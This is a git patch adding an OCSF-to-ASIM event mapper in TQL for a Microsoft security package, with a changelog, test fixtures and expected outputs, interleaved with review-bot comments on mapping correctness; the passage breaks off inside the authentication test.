From 146507e39c0376b77c333b79e7d1aae6bbaeb323 Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Sun, 7 Jun 2026 12:03:08 +0200 Subject: [PATCH 01/27] Add OCSF to ASIM mapper Map the Microsoft OCSF package into the ASIM event\nshapes it already emits, covering alert, audit, authentication,\nprocess, user-management, file, network, DNS, DHCP, and web\nsessions. Add strict failure coverage for unsupported classes and\nkeep the package tests aligned with the new mapper. Assisted-by: GPT-5 (Codex) --- .../unreleased/ocsf-to-asim-mapper.md | 15 + microsoft/operators/ocsf/asim/common.tql | 123 ++++++++ microsoft/operators/ocsf/asim/unsupported.tql | 12 + microsoft/operators/ocsf/map_to_asim.tql | 292 ++++++++++++++++++ microsoft/tests/ocsf-to-asim/alert.tql | 59 ++++ microsoft/tests/ocsf-to-asim/alert.txt | 18 ++ microsoft/tests/ocsf-to-asim/audit.tql | 47 +++ microsoft/tests/ocsf-to-asim/audit.txt | 18 ++ .../tests/ocsf-to-asim/authentication.tql | 120 +++++++ .../tests/ocsf-to-asim/authentication.txt | 48 +++ .../tests/ocsf-to-asim/direct-targets.tql | 163 ++++++++++ .../tests/ocsf-to-asim/direct-targets.txt | 140 +++++++++ microsoft/tests/ocsf-to-asim/process.tql | 56 ++++ microsoft/tests/ocsf-to-asim/process.txt | 19 ++ .../tests/ocsf-to-asim/unsupported-strict.tql | 30 ++ .../tests/ocsf-to-asim/unsupported-strict.txt | 1 + .../tests/ocsf-to-asim/user-management.tql | 86 ++++++ .../tests/ocsf-to-asim/user-management.txt | 38 +++ 18 files changed, 1285 insertions(+) create mode 100644 microsoft/changelog/unreleased/ocsf-to-asim-mapper.md create mode 100644 microsoft/operators/ocsf/asim/common.tql create mode 100644 microsoft/operators/ocsf/asim/unsupported.tql create mode 100644 microsoft/operators/ocsf/map_to_asim.tql create mode 100644 microsoft/tests/ocsf-to-asim/alert.tql create mode 100644 microsoft/tests/ocsf-to-asim/alert.txt create mode 100644 microsoft/tests/ocsf-to-asim/audit.tql create mode 100644 microsoft/tests/ocsf-to-asim/audit.txt create mode 100644 microsoft/tests/ocsf-to-asim/authentication.tql create mode 100644 
microsoft/tests/ocsf-to-asim/authentication.txt create mode 100644 microsoft/tests/ocsf-to-asim/direct-targets.tql create mode 100644 microsoft/tests/ocsf-to-asim/direct-targets.txt create mode 100644 microsoft/tests/ocsf-to-asim/process.tql create mode 100644 microsoft/tests/ocsf-to-asim/process.txt create mode 100644 microsoft/tests/ocsf-to-asim/unsupported-strict.tql create mode 100644 microsoft/tests/ocsf-to-asim/unsupported-strict.txt create mode 100644 microsoft/tests/ocsf-to-asim/user-management.tql create mode 100644 microsoft/tests/ocsf-to-asim/user-management.txt
diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md
new file mode 100644
index 0000000..c7c3730
--- /dev/null
+++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md
@@ -0,0 +1,15 @@
+---
+title: OCSF to ASIM mapper
+type: feature
+authors:
+ - mavam
+ - codex
+created: 2026-06-07T00:00:00Z
+---
+
+The Microsoft package now includes `microsoft::ocsf::map_to_asim` to convert
+validated OCSF 1.8 events into flat Microsoft Sentinel ASIM event records.
+
+The mapper covers the Microsoft package's current OCSF authentication, process,
+audit, user-management, and alert outputs, plus direct OCSF counterparts for
+file, network, DNS, DHCP, and web session ASIM schemas.
diff --git a/microsoft/operators/ocsf/asim/common.tql b/microsoft/operators/ocsf/asim/common.tql
new file mode 100644
index 0000000..60d18d7
--- /dev/null
+++ b/microsoft/operators/ocsf/asim/common.tql
@@ -0,0 +1,123 @@
+---
+description: Initializes shared ASIM fields from a validated OCSF event.
+---
+
+asim = {}
+
+asim.EventCount = 1
+asim.EventStartTime = time
+asim.EventEndTime = end_time? else time
+asim.EventProduct = metadata?.product?.name? else metadata?.product?.feature?.name? else "Unknown"
+asim.EventVendor = metadata?.product?.vendor_name? else "Microsoft"
+
+if metadata?.original_event_uid? != null {
+ asim.EventOriginalUid = metadata.original_event_uid
+ asim.EventUid = metadata.original_event_uid
+}
+if metadata?.event_code? != null {
+ asim.EventOriginalType = metadata.event_code
+} else {
+ asim.EventOriginalType = type_uid.string()
+}
+if message? != null {
+ asim.EventMessage = message
+}
+
+match severity_id? {
+ 1 => {
+ asim.EventSeverity = "Informational"
+ }
+ 2 => {
+ asim.EventSeverity = "Low"
+ }
+ 3 => {
+ asim.EventSeverity = "Medium"
+ }
+ 4 => {
+ asim.EventSeverity = "High"
+ }
+ 5 => {
+ asim.EventSeverity = "High"
+ asim.EventOriginalSeverity = severity? else "Critical"
+ }
+ _ if severity? == "Critical" => {
+ asim.EventSeverity = "High"
+ asim.EventOriginalSeverity = severity
+ }
+ _ if severity? != null => {
+ asim.EventSeverity = severity
+ }
+ _ => {}
+}
+
+match status? {
+ "Success" => {
+ asim.EventResult = "Success"
+ }
+ "Failure" => {
+ asim.EventResult = "Failure"
+ }
+ "Partial" => {
+ asim.EventResult = "Partial"
+ }
+ _ => {
+ match status_id? {
+ 1 if class_uid != 2003 and class_uid != 2004 and class_uid != 2005 => {
+ asim.EventResult = "Success"
+ }
+ 2 => {
+ asim.EventResult = "Failure"
+ }
+ _ => {
+ asim.EventResult = "NA"
+ }
+ }
+ }
+}
+if status_detail? != null {
+ asim.EventOriginalResultDetails = status_detail
+}
+if status_code? != null {
+ asim.EventOriginalResultDetails = status_code.string()
+}
+
+if device?.hostname? != null {
+ asim.Dvc = device.hostname
+ asim.DvcHostname = device.hostname
+ asim.DvcFQDN = device.hostname
+}
+if device?.uid? != null {
+ asim.DvcId = device.uid
+}
+if device?.ip? != null {
+ asim.DvcIpAddr = device.ip
+ if asim.Dvc? == null {
+ asim.Dvc = device.ip.string()
+ }
+}
+if asim.Dvc? == null {
+ asim.Dvc = asim.EventProduct
+}
+
+if disposition? != null {
+ asim.DvcAction = disposition
+}
+if action? != null {
+ asim.DvcAction = action
+}
+
+asim.AdditionalFields = {
+ category_uid: category_uid?,
+ category_name: category_name?,
+ class_uid: class_uid?,
+ class_name: class_name?,
+ activity_id: activity_id?,
+ activity_name: activity_name?,
+ type_uid: type_uid?,
+ type_name: type_name?,
+ metadata: metadata?,
+ cloud: cloud?,
+ unmapped: unmapped?,
+ raw_data: raw_data?,
+ raw_data_size: raw_data_size?,
+}
diff --git a/microsoft/operators/ocsf/asim/unsupported.tql b/microsoft/operators/ocsf/asim/unsupported.tql
new file mode 100644
index 0000000..fe57184
--- /dev/null
+++ b/microsoft/operators/ocsf/asim/unsupported.tql
@@ -0,0 +1,12 @@
+---
+description: Drops unsupported OCSF → ASIM mappings with a warning.
+---
+
+assert false, message={
+ reason: "unsupported OCSF to ASIM mapping",
+ class_uid: class_uid?,
+ class_name: class_name?,
+ type_uid: type_uid?,
+ type_name: type_name?,
+ name: @name,
+}
diff --git a/microsoft/operators/ocsf/map_to_asim.tql b/microsoft/operators/ocsf/map_to_asim.tql
new file mode 100644
index 0000000..03283d7
--- /dev/null
+++ b/microsoft/operators/ocsf/map_to_asim.tql
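Review bot: The `_ if severity? != null => { asim.EventSeverity = severity }` arm of the severity match copies an arbitrary source string into EventSeverity, which ASIM restricts to Informational, Low, Medium and High, so a severity_id of 0 or 99 whose severity is "Unknown" or "Other" yields an out-of-vocabulary value that downstream rules keyed on EventSeverity will not match; that string belongs in EventOriginalSeverity, with EventSeverity left unset. EventOriginalSeverity is otherwise populated only for severity_id 5 and for "Critical", so the source severity is dropped for 1-4; assigning `asim.EventOriginalSeverity = severity?` once before the match covers every case. The consecutive `if status_detail? != null` and `if status_code? != null` blocks write the same EventOriginalResultDetails field, so status_code silently overwrites status_detail when both exist, and the `disposition`/`action` pair does the same to DvcAction; state the precedence in a comment or fold each pair into a single `else` chain. Note also that DvcAction receives the raw OCSF `action` or `disposition` text (e.g. "Allowed"), whereas only the 4001 arm of map_to_asim.tql normalizes it to the ASIM "Allow"/"Deny" vocabulary.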
@@ -0,0 +1,292 @@
+---
+description: Validated OCSF 1.8 event → Microsoft Sentinel ASIM event.
+---
+
+microsoft::ocsf::asim::common
+
+match class_uid {
+ 2003 | 2004 => {
+ @name = "asim.alert_event"
+ asim.EventSchema = "AlertEvent"
+ asim.EventSchemaVersion = "0.1"
+ asim.EventType = "Alert"
+ asim.EventUid = finding_info?.uid? else metadata?.original_event_uid?
+ assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+
+ asim.AlertName = finding_info?.title? else message?
+ asim.EventReportUrl = finding_info?.url? else null
+ asim.EventSubType = "Compliance Violation" if class_uid == 2003 else "Threat"
+ asim.ThreatName = malware?[0]?.name? else finding_info?.title?
+ asim.ThreatCategory = finding_info?.types?[0]? else compliance?.status?
+ asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name?
+ asim.UserId = user?.uid? else actor?.user?.uid?
+ asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null
+ match status? {
+ "New" | "Active" | "In Progress" => {
+ asim.AlertStatus = "Active"
+ }
+ "Resolved" | "Closed" => {
+ asim.AlertStatus = "Closed"
+ }
+ _ => {}
+ }
+ asim.AlertOriginalStatus = status?
+ asim.AlertVerdict = verdict?
+ }
+ 1006 | 1008 | 3004 | 201004 => {
+ @name = "asim.audit_event"
+ asim.EventSchema = "AuditEvent"
+ asim.EventSchemaVersion = "0.1.2"
+ asim.EventType = "Other"
+ match activity_name {
+ "Create" => { asim.EventType = "Create" }
+ "Read" => { asim.EventType = "Read" }
+ "Update" | "Set" => { asim.EventType = "Set" }
+ "Delete" => { asim.EventType = "Delete" }
+ "Execute" => { asim.EventType = "Execute" }
+ "Install" => { asim.EventType = "Install" }
+ "Clear" => { asim.EventType = "Clear" }
+ "Enable" => { asim.EventType = "Enable" }
+ "Disable" => { asim.EventType = "Disable" }
+ "Start" => { asim.EventType = "Start" }
+ "Stop" => { asim.EventType = "Stop" }
+ _ => {}
+ }
+ asim.Operation = activity_name? else type_name? else asim.EventType
+ asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?
+ assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+ match class_uid {
+ 1006 => { asim.ObjectType = "Scheduled Task" }
+ 1008 => { asim.ObjectType = "Event Log" }
+ 3004 => { asim.ObjectType = "Directory Service Object" }
+ 201004 => { asim.ObjectType = "Service" }
+ _ => {}
+ }
+ asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
+ if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+ }
+ asim.ActorUserId = actor?.user?.uid?
+ asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+ asim.SrcIpAddr = src_endpoint?.ip?
+ asim.TargetHostname = dst_endpoint?.hostname?
+ asim.TargetIpAddr = dst_endpoint?.ip?
+ }
+ 3002 | 3003 => {
+ @name = "asim.authentication"
+ asim.EventSchema = "Authentication"
+ asim.EventSchemaVersion = "0.1.4"
+ asim.EventType = "Elevate" if class_uid == 3003 else "Logon"
+ asim.EventSubType = activity_name?
+ asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
+ if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+ }
+ asim.ActorUserId = actor?.user?.uid?
+ asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+ asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt?
+ asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid?
+ if user?.domain? != null and user?.name? != null {
+ asim.TargetUsername = f"{user.domain}\\{user.name}"
+ asim.TargetUsernameType = "Windows"
+ asim.TargetDomain = user.domain
+ asim.TargetDomainType = "Windows"
+ }
+ asim.TargetUserId = user?.uid?
+ asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
+ asim.TargetSessionId = session?.uid? else session?.uid_alt?
+ asim.SrcIpAddr = src_endpoint?.ip?
+ asim.SrcHostname = src_endpoint?.hostname?
+ asim.SrcPortNumber = src_endpoint?.port?
+ asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname?
+ asim.TargetAppId = service?.uid? else dst_endpoint?.uid?
+ asim.TargetAppName = service?.name? else dst_endpoint?.svc_name?
+ asim.LogonProtocol = auth_protocol?
+ if auth_factors? != null {
+ asim.LogonMethod = auth_factors[0]?.factor_type?
+ }
+ }
+ 3001 | 3006 => {
+ @name = "asim.user_management"
+ asim.EventSchema = "UserManagement"
+ asim.EventSchemaVersion = "0.1.2"
+ asim.EventSeverity = asim.EventSeverity? else "Informational"
+ asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
+ if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+ }
+ assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+ asim.ActorUserId = actor?.user?.uid?
+ asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+
+ if class_uid == 3001 {
+ match activity_name {
+ "Create" => { asim.EventType = "UserCreated" }
+ "Delete" => { asim.EventType = "UserDeleted" }
+ "Update" => { asim.EventType = "UserModified" }
+ "Lock" => { asim.EventType = "UserLocked" }
+ "Unlock" => { asim.EventType = "UserUnlocked" }
+ "Disable" => { asim.EventType = "UserDisabled" }
+ "Enable" => { asim.EventType = "UserEnabled" }
+ "Password Change" => { asim.EventType = "PasswordChanged" }
+ "Password Reset" => { asim.EventType = "PasswordReset" }
+ _ => { asim.EventType = "UserModified" }
+ }
+ } else {
+ match activity_name {
+ "Create" => { asim.EventType = "GroupCreated" }
+ "Delete" => { asim.EventType = "GroupDeleted" }
+ "Add User" => { asim.EventType = "UserAddedToGroup" }
+ "Remove User" => { asim.EventType = "UserRemovedFromGroup" }
+ "Read" => { asim.EventType = "GroupRead" }
+ _ => { asim.EventType = "GroupModified" }
+ }
+ }
+
+ asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid?
+ if user?.domain? != null and user?.name? != null {
+ asim.TargetUsername = f"{user.domain}\\{user.name}"
+ asim.TargetUsernameType = "Windows"
+ }
+ asim.TargetUserId = user?.uid?
+ asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
+ asim.GroupName = group?.name?
+ asim.GroupId = group?.uid?
+ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null
+ asim.SrcIpAddr = src_endpoint?.ip?
+ asim.SrcHostname = src_endpoint?.hostname?
+ }
+ 1007 => {
+ @name = "asim.process_event"
+ asim.EventSchema = "ProcessEvent"
+ asim.EventSchemaVersion = "0.1.4"
+ match activity_name {
+ "Launch" => { asim.EventType = "ProcessCreated" }
+ "Terminate" => { asim.EventType = "ProcessTerminated" }
+ _ => { microsoft::ocsf::asim::unsupported }
+ }
+ asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
+ if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+ }
+ asim.ActorUserId = actor?.user?.uid?
+ asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+ asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string()
+ asim.ParentProcessId = process?.parent_process?.pid?.string()
+ asim.TargetProcessId = process?.pid?.string()
+ asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1]
+ asim.TargetProcessCommandLine = process?.cmd_line?
+ asim.TargetUserId = user?.uid?
+ assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null,
+ message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+ }
+ 1001 => {
+ @name = "asim.file_event"
+ asim.EventSchema = "FileEvent"
+ asim.EventSchemaVersion = "0.2.2"
+ match activity_name {
+ "Create" => { asim.EventType = "FileCreated" }
+ "Read" | "Open" => { asim.EventType = "FileAccessed" }
+ "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" }
+ "Delete" => { asim.EventType = "FileDeleted" }
+ "Rename" => { asim.EventType = "FileRenamed" }
+ _ => { asim.EventType = "FileCreatedOrModified" }
+ }
+ asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
+ if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+ }
+ asim.ActorUserId = actor?.user?.uid?
+ asim.TargetFilePath = file?.path? else file?.name?
+ asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local"
+ asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1]
+ asim.SrcFilePath = file_result?.path?
+ asim.SrcFileName = file_result?.name?
+ assert asim.ActorUsername != null and asim.TargetFilePath != null,
+ message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+ }
+ 4001 => {
+ @name = "asim.network_session"
+ asim.EventSchema = "NetworkSession"
+ asim.EventSchemaVersion = "0.2.7"
+ asim.EventType = "NetworkSession"
+ asim.EventType = "Flow" if activity_name == "Traffic" else asim.EventType
+ asim.SrcIpAddr = src_endpoint?.ip?
+ asim.SrcHostname = src_endpoint?.hostname?
+ asim.SrcPortNumber = src_endpoint?.port?
+ asim.DstIpAddr = dst_endpoint?.ip?
+ asim.DstHostname = dst_endpoint?.hostname?
+ asim.DstPortNumber = dst_endpoint?.port?
+ asim.SrcBytes = traffic?.bytes_out?
+ asim.DstBytes = traffic?.bytes_in?
+ match disposition? {
+ "Allowed" => {
+ asim.DvcAction = "Allow"
+ asim.EventResult = "Success"
+ }
+ "Blocked" | "Denied" => {
+ asim.DvcAction = "Deny"
+ asim.EventResult = "Failure"
+ asim.EventSeverity = asim.EventSeverity? else "Low"
+ }
+ _ => {}
+ }
+ }
+ 4002 => {
+ @name = "asim.web_session"
+ asim.EventSchema = "WebSession"
+ asim.EventSchemaVersion = "0.2.7"
+ asim.EventType = "HTTPsession"
+ asim.Url = url?.url_string? else http_request?.url?
+ asim.HttpRequestMethod = http_request?.http_method? else http_request?.method? else activity_name?.to_upper()
+ asim.EventResultDetails = http_response?.code?.string() else status_code?.string()
+ if http_response?.code? != null {
+ asim.EventResult = "Success" if http_response.code < 400 else "Failure"
+ }
+ assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+ }
+ 4003 => {
+ @name = "asim.dns"
+ asim.EventSchema = "Dns"
+ asim.EventSchemaVersion = "0.1.7"
+ asim.EventType = activity_name? else "Query"
+ asim.DnsQuery = query?.name? else query?.hostname? else query?.value?
+ asim.DnsQueryTypeName = query?.type? else query?.type_name?
+ asim.DnsQueryClassName = query?.class? else query?.class_name?
+ asim.EventResultDetails = rcode? else "NA"
+ asim.SrcIpAddr = src_endpoint?.ip?
+ asim.SrcHostname = src_endpoint?.hostname?
+ asim.DstIpAddr = dst_endpoint?.ip?
+ asim.DstHostname = dst_endpoint?.hostname?
+ assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+ }
+ 4004 => {
+ @name = "asim.dhcp_event"
+ asim.EventSchema = "DhcpEvent"
+ asim.EventSchemaVersion = "0.1.1"
+ match activity_name {
+ "Ack" | "Offer" => { asim.EventType = "Assign" }
+ "Request" => { asim.EventType = "Renew" }
+ "Release" => { asim.EventType = "Release" }
+ _ => { asim.EventType = "Assign" }
+ }
+ asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string()
+ asim.SrcIpAddr = src_endpoint?.ip?
+ asim.SrcMacAddr = src_endpoint?.mac? else src_endpoint?.mac_addr?
+ assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null,
+ message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+ }
+ 0 | 1002 | 1003 | 1004 | 1005 | 1009 | 1010 | 2001 | 2002 | 2005 | 2006 | 2007 | 2008 | 3005 | 4005 | 4006 | 4007 | 4008 | 4009 | 4010 | 4011 | 4012 | 4013 | 4014 | 5001 | 5002 | 5003 | 5004 | 5006 | 5007 | 5008 | 5009 | 5010 | 5011 | 5012 | 5013 | 5014 | 5015 | 5016 | 5017 | 5018 | 5019 | 5020 | 5021 | 5022 | 5023 | 5040 | 6001 | 6002 | 6003 | 6004 | 6005 | 6006 | 6007 | 6008 | 7001 | 7002 | 7003 | 7004 | 8001 | 8002 => {
+ microsoft::ocsf::asim::unsupported
+ }
+ _ => {
+ microsoft::ocsf::asim::unsupported
+ }
+}
+
+this = asim
diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/ocsf-to-asim/alert.tql
new file mode 100644
index 0000000..81c83a0
--- /dev/null
+++ b/microsoft/tests/ocsf-to-asim/alert.tql
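Review bot: In the 3002 | 3003 arm `asim.EventType = "Elevate" if class_uid == 3003 else "Logon"` labels every Authentication event as a logon, so an OCSF "Logoff" activity reaches ASIM with EventType "Logon" and only EventSubType hints at the difference, which skews any detection keyed on logon counts; derive it from activity_name first, e.g. `asim.EventType = "Logoff" if activity_name == "Logoff" else ("Elevate" if class_uid == 3003 else "Logon")`. The `if user?.domain? != null and user?.name? != null` override in the same arm (and the actor/user variants in the 1006, 3001, 1007 and 1001 arms) replaces an email_addr-derived name with `domain\name` tagged "Windows", which the authentication.txt expectation shows as `example.com\\alice` for an Entra ID sign-in; apply the override only when email_addr is absent and tag an email-derived value as "UPN" so entity correlation in Sentinel works. In the 4002 arm `asim.Url = url?.url_string? else http_request?.url?` falls back to what in OCSF 1.x is a URL object rather than a string, so the fallback is probably `http_request?.url?.url_string?`. The 1007 arm's assert requires `asim.TargetProcessCommandLine != null` for "Terminate" as well as "Launch", so termination events whose source carries no cmd_line would all be dropped with the "insufficient OCSF fields" warning; relax that conjunct for ProcessTerminated if the package's terminate events lack it. In the 1001 arm `asim.SrcFilePath = file_result?.path?` looks inverted for "Rename", where OCSF's file_result is the resulting file and ASIM's TargetFilePath is the new name — worth confirming against the class definition.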
@@ -0,0 +1,59 @@
+from {
+ activity_id: 1,
+ activity_name: "Create",
+ attacks: [
+ {
+ technique: {
+ uid: "T1059",
+ },
+ },
+ ],
+ category_uid: 2,
+ category_name: "Findings",
+ class_uid: 2004,
+ class_name: "Detection Finding",
+ type_uid: 200401,
+ type_name: "Detection Finding: Create",
+ time: 2026-05-01T10:10:00Z,
+ end_time: 2026-05-01T10:12:00Z,
+ severity_id: 4,
+ severity: "High",
+ status_id: 1,
+ status: "New",
+ verdict: "True Positive",
+ metadata: {
+ log_name: "security/alerts_v2",
+ original_event_uid: "alert-1",
+ product: {
+ name: "Microsoft Defender",
+ vendor_name: "Microsoft",
+ feature: {
+ name: "Microsoft Graph",
+ },
+ },
+ profiles: ["cloud", "incident", "security_control"],
+ tenant_uid: "11111111-1111-1111-1111-111111111111",
+ version: "1.8.0",
+ },
+ cloud: {
+ provider: "Azure",
+ },
+ finding_info: {
+ uid: "alert-1",
+ title: "Suspicious PowerShell",
+ desc: "PowerShell launched with suspicious arguments.",
+ types: ["malware"],
+ },
+ malware: [
+ {
+ name: "Trojan",
+ },
+ ],
+}
+@name = "ocsf.detection_finding"
+microsoft::ocsf::map_to_asim
+name = @name
+select name, EventSchema, EventSchemaVersion, EventType, EventUid,
+ EventSeverity, EventOriginalUid, EventProduct, EventVendor, AlertName,
+ EventSubType, ThreatName, ThreatCategory, AlertStatus,
+ AlertOriginalStatus, AlertVerdict
diff --git a/microsoft/tests/ocsf-to-asim/alert.txt b/microsoft/tests/ocsf-to-asim/alert.txt
new file mode 100644
index 0000000..c8358c3
--- /dev/null
+++ b/microsoft/tests/ocsf-to-asim/alert.txt
@@ -0,0 +1,18 @@
+{
+ name: "asim.alert_event",
+ EventSchema: "AlertEvent",
+ EventSchemaVersion: "0.1",
+ EventType: "Alert",
+ EventUid: "alert-1",
+ EventSeverity: "High",
+ EventOriginalUid: "alert-1",
+ EventProduct: "Microsoft Defender",
+ EventVendor: "Microsoft",
+ AlertName: "Suspicious PowerShell",
+ EventSubType: "Threat",
+ ThreatName: "Trojan",
+ ThreatCategory: "malware",
+ AlertStatus: "Active",
+ AlertOriginalStatus: "New",
+ AlertVerdict: "True Positive",
+}
diff --git a/microsoft/tests/ocsf-to-asim/audit.tql b/microsoft/tests/ocsf-to-asim/audit.tql
new file mode 100644
index 0000000..d1e4325
--- /dev/null
+++ b/microsoft/tests/ocsf-to-asim/audit.tql
@@ -0,0 +1,47 @@
+from {
+ activity_id: 1,
+ activity_name: "Clear",
+ category_uid: 1,
+ category_name: "System Activity",
+ class_uid: 1008,
+ class_name: "Event Log Activity",
+ type_uid: 100801,
+ type_name: "Event Log Activity: Clear",
+ time: 2024-03-23T12:34:56.789012300Z,
+ severity_id: 4,
+ severity: "High",
+ metadata: {
+ event_code: "1102",
+ log_name: "Security",
+ original_event_uid: "99001",
+ product: {
+ name: "Microsoft-Windows-Eventlog",
+ vendor_name: "Microsoft",
+ },
+ profiles: ["host"],
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "WINHOST01.corp.local",
+ },
+ actor: {
+ process: {
+ pid: 4660,
+ },
+ session: {
+ uid_alt: "0xA1B2C3",
+ },
+ user: {
+ domain: "CORP",
+ name: "jdoe",
+ uid: "S-1-5-21-3107921522-2185401913-891411500-1104",
+ },
+ },
+}
+@name = "ocsf.event_log_activity"
+microsoft::ocsf::map_to_asim
+name = @name
+select name, EventSchema, EventSchemaVersion, EventType, EventResult,
+ EventSeverity, EventOriginalType, Dvc, DvcHostname, Object, ObjectType,
+ Operation, ActorUsername, ActorUsernameType, ActorUserId,
+ ActorUserIdType
diff --git a/microsoft/tests/ocsf-to-asim/audit.txt b/microsoft/tests/ocsf-to-asim/audit.txt
new file mode 100644
index 0000000..e9f470c
--- /dev/null
+++ b/microsoft/tests/ocsf-to-asim/audit.txt
@@ -0,0 +1,18 @@
+{
+ name: "asim.audit_event",
+ EventSchema: "AuditEvent",
+ EventSchemaVersion: "0.1.2",
+ EventType: "Clear",
+ EventResult: "NA",
+ EventSeverity: "High",
+ EventOriginalType: "1102",
+ Dvc: "WINHOST01.corp.local",
+ DvcHostname: "WINHOST01.corp.local",
+ Object: "Security",
+ ObjectType: "Event Log",
+ Operation: "Clear",
+ ActorUsername: "CORP\\jdoe",
+ ActorUsernameType: "Windows",
+ ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104",
+ ActorUserIdType: "SID",
+}
diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/ocsf-to-asim/authentication.tql
new file mode 100644
index 0000000..e0cfa9f
--- /dev/null
+++ b/microsoft/tests/ocsf-to-asim/authentication.tql
@@ -0,0 +1,120 @@
+from {
+ activity_id: 1,
+ activity_name: "Logon",
+ category_uid: 3,
+ category_name: "Identity & Access Management",
+ class_uid: 3002,
+ class_name: "Authentication",
+ type_uid: 300201,
+ type_name: "Authentication: Logon",
+ time: 2024-03-23T12:34:56.789012300Z,
+ severity_id: 1,
+ severity: "Informational",
+ status_id: 1,
+ status: "Success",
+ auth_protocol: "Kerberos",
+ metadata: {
+ event_code: "4624",
+ original_event_uid: "98761",
+ product: {
+ name: "Microsoft-Windows-Security-Auditing",
+ vendor_name: "Microsoft",
+ },
+ profiles: ["host"],
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "DC01.corp.local",
+ },
+ src_endpoint: {
+ ip: 10.0.0.42,
+ port: 49827,
+ },
+ actor: {
+ user: {
+ uid: "S-1-0-0",
+ },
+ session: {
+ uid_alt: "0x0",
+ },
+ },
+ user: {
+ domain: "CORP",
+ name: "jdoe",
+ uid: "S-1-5-21-3107921522-2185401913-891411500-1104",
+ },
+}, {
+ activity_id: 1,
+ activity_name: "Logon",
+ category_uid: 3,
+ category_name: "Identity & Access Management",
+ class_uid: 3002,
+ class_name: "Authentication",
+ type_uid: 300201,
+ type_name: "Authentication: Logon",
+ time: 2026-05-01T10:00:00Z,
+ severity_id: 1,
+ severity: "Informational",
+ status_id: 1,
+ status: "Success",
+ metadata: {
+ log_name: "auditLogs/signIns",
+ original_event_uid: "sign-in-1",
+ product: {
+ name: "Microsoft Entra ID",
+ vendor_name: "Microsoft",
+ feature: {
+ name: "Microsoft Graph",
+ },
+ },
+ profiles: ["cloud", "security_control"],
+ version: "1.8.0",
+ },
+ cloud: {
+ provider: "Azure",
+ },
+ actor: {
+ user: {
+ domain: "example.com",
+ email_addr: "alice@example.com",
